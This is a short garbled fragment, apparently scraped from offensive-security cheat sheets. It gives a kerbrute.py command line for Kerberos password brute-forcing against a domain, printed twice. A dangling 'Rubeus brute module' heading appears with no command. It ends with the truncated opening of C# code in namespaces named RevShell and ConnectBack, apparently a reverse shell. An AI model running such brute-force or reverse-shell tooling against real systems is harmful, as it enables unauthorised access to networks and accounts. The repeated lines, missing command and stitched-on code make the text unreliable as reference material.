With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| namespace RevShell | |
| { | |
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Net.Sockets; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace ConnectBack |